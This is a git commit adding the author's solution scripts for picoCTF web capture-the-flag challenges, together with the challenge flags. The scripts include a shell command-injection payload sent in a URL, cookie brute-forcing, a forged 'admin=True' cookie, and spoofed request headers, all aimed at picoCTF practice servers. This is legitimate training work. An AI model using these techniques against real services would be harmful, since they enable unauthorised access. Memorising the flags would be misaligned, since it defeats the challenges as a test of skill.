web: add already solved challenges

This commit is contained in:
Oystein Kristoffer Tveit 2024-09-01 23:08:46 +02:00
parent 45b391c5f1
commit 9f5d34fe87
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
20 changed files with 251 additions and 0 deletions

3
web/GET_aHEAD/solve.sh Executable file
View File

@ -0,0 +1,3 @@
#!/usr/bin/env bash
curl --head "http://mercury.picoctf.net:53554/" | grep -o "picoCTF{.*}"

20
web/caas/solve.py Executable file
View File

@ -0,0 +1,20 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3Packages.requests
# coding: utf-8
import json
import requests
BASE_URL = "https://caas.mars.picoctf.net/cowsay"
def main():
# payload = "$(ls)"
payload = "$(cat falg.txt)"
r = requests.get(BASE_URL + f"/{payload}")
print(r)
print(r.text)
if __name__ == '__main__':
main()

28
web/cookies/solve.py Executable file
View File

@ -0,0 +1,28 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3Packages.requests
# coding: utf-8
import json
import requests
BASE_URL = "http://mercury.picoctf.net:6418/check"
def main():
for n in range(100):
r = requests.get(
BASE_URL,
cookies = {
'name': str(n),
},
)
print(r)
if "pico" in r.text:
print(r.text)
break
# print(r.text.split('\n')[41])
if __name__ == '__main__':
main()

View File

@ -0,0 +1,15 @@
```javascript
<...>
if (checkpass.substring(0, split) == 'pico') {
if (checkpass.substring(split*6, split*7) == 'a3c8') {
if (checkpass.substring(split, split*2) == 'CTF{') {
if (checkpass.substring(split*4, split*5) == 'ts_p') {
if (checkpass.substring(split*3, split*4) == 'lien') {
if (checkpass.substring(split*5, split*6) == 'lz_1') {
if (checkpass.substring(split*2, split*3) == 'no_c') {
if (checkpass.substring(split*7, split*8) == '9}') {
alert("Password Verified")
<...>
```
`picoCTF{no_clients_plz_1a3c89}`

4
web/findme/solve.sh Executable file
View File

@ -0,0 +1,4 @@
#!/usr/bin/env bash
# Taken from redirects
echo "cGljb0NURntwcm94aWVzX2FsbF90aGVfd2F5XzAxZTc0OGRifQ==" | base64 -d

View File

@ -0,0 +1,37 @@
<!doctype html>
<html>
<head>
<title>My First Website :)</title>
<link href="https://fonts.googleapis.com/css?family=Open+Sans|Roboto" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="mycss.css">
<script type="application/javascript" src="myjs.js"></script>
</head>
<body>
<div class="container">
<header>
<h1>Inspect Me</h1>
</header>
<button class="tablink" onclick="openTab('tabintro', this, '#222')" id="defaultOpen">What</button>
<button class="tablink" onclick="openTab('tababout', this, '#222')">How</button>
<div id="tabintro" class="tabcontent">
<h3>What</h3>
<p>I made a website</p>
</div>
<div id="tababout" class="tabcontent">
<h3>How</h3>
<p>I used these to make this site: <br/>
HTML <br/>
CSS <br/>
JS (JavaScript)
</p>
<!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 -->
</div>
</div>
</body>
</html>

View File

@ -0,0 +1,51 @@
div.container {
width: 100%;
}
header {
background-color: black;
padding: 1em;
color: white;
clear: left;
text-align: center;
}
body {
font-family: Roboto;
}
h1 {
color: white;
}
p {
font-family: "Open Sans";
}
.tablink {
background-color: #555;
color: white;
float: left;
border: none;
outline: none;
cursor: pointer;
padding: 14px 16px;
font-size: 17px;
width: 50%;
}
.tablink:hover {
background-color: #777;
}
.tabcontent {
color: #111;
display: none;
padding: 50px;
text-align: center;
}
#tabintro { background-color: #ccc; }
#tababout { background-color: #ccc; }
/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */

View File

@ -0,0 +1,21 @@
function openTab(tabName,elmnt,color) {
var i, tabcontent, tablinks;
tabcontent = document.getElementsByClassName("tabcontent");
for (i = 0; i < tabcontent.length; i++) {
tabcontent[i].style.display = "none";
}
tablinks = document.getElementsByClassName("tablink");
for (i = 0; i < tablinks.length; i++) {
tablinks[i].style.backgroundColor = "";
}
document.getElementById(tabName).style.display = "block";
if(elmnt.style != null) {
elmnt.style.backgroundColor = color;
}
}
window.onload = function() {
openTab('tabintro', this, '#222');
}
/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?832b0699} */

24
web/login/solve.sh Executable file
View File

@ -0,0 +1,24 @@
#!/usr/bin/env bash
echo "cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ" | base64 -d
# (
# async() => {
# await new Promise((e => window.addEventListener('load', e))),
# document.querySelector('form').addEventListener(
# 'submit',
# (
# e => {
# e.preventDefault();
# const r = {
# u: 'input[name=username]',
# p: 'input[name=password]'
# },
# t = {};
# for (const e in r) t[e] = btoa(document.querySelector(r[e]).value).replace(/=/g, '');
# return 'YWRtaW4' !== t.u ? alert('Incorrect Username') : 'cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ' !== t.p ? alert('Incorrect Password') : void alert(`Correct Password! Your flag is ${ atob(t.p) }.`)
# }
# )
# )
# }
# ) ();

4
web/logon/solve.sh Executable file
View File

@ -0,0 +1,4 @@
#!/usr/bin/env bash
curl 'https://jupiter.challenges.picoctf.org/problem/13594/flag' -H 'Cookie: admin=True' | grep -o "picoCTF{.*}"

View File

@ -0,0 +1,16 @@
```javascript
function send_request() {
let val = document.getElementById("name").value;
// ^p.....F!?
fetch(`/flag?input=${val}`)
.then(res => res.text())
.then(res => {
const res_json = JSON.parse(res);
alert(res_json.flag)
return false;
})
return false;
}
```
`picoCTF` -> `picoCTF{succ3ssfully_matchtheregex_f89ea585}`

3
web/picobrowser/solve.sh Executable file
View File

@ -0,0 +1,3 @@
#!/usr/bin/env bash
curl 'https://jupiter.challenges.picoctf.org/problem/26704/flag' -H 'User-Agent: picobrowser' | grep -o "picoCTF{.*}"

View File

@ -0,0 +1 @@
_a69684fd}

View File

@ -0,0 +1 @@
h4ts_4_l0

View File

@ -0,0 +1 @@
3s_2_lO0k

View File

@ -0,0 +1 @@
picoCTF{t

View File

@ -0,0 +1 @@
t_0f_pl4c

4
web/scavenger/solve.sh Executable file
View File

@ -0,0 +1,4 @@
#!/usr/bin/env bash
cat html-part.txt css-part.txt robots-part.txt htaccess-part.txt DS-store-part.txt | tr -d \\n

View File

@ -0,0 +1,5 @@
#!/usr/bin/env bash
curl https://jupiter.challenges.picoctf.org/problem/36474/
curl https://jupiter.challenges.picoctf.org/problem/36474/robots.txt
curl https://jupiter.challenges.picoctf.org/problem/36474/477ce.html

11
web/who-are-you/solve.sh Executable file
View File

@ -0,0 +1,11 @@
#!/usr/bin/env bash
# https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers
curl 'http://mercury.picoctf.net:39114/' \
-H 'User-Agent: PicoBrowser' \
-H 'Referer: http://mercury.picoctf.net:39114/' \
-H 'Date: Wed, 21 Oct 2018 07:28:00 GMT' \
-H 'DNT: 1' \
-H 'X-Forwarded-For: 104.123.68.13' \
-H 'Accept-Language: sv' | grep -o "picoCTF{.*}"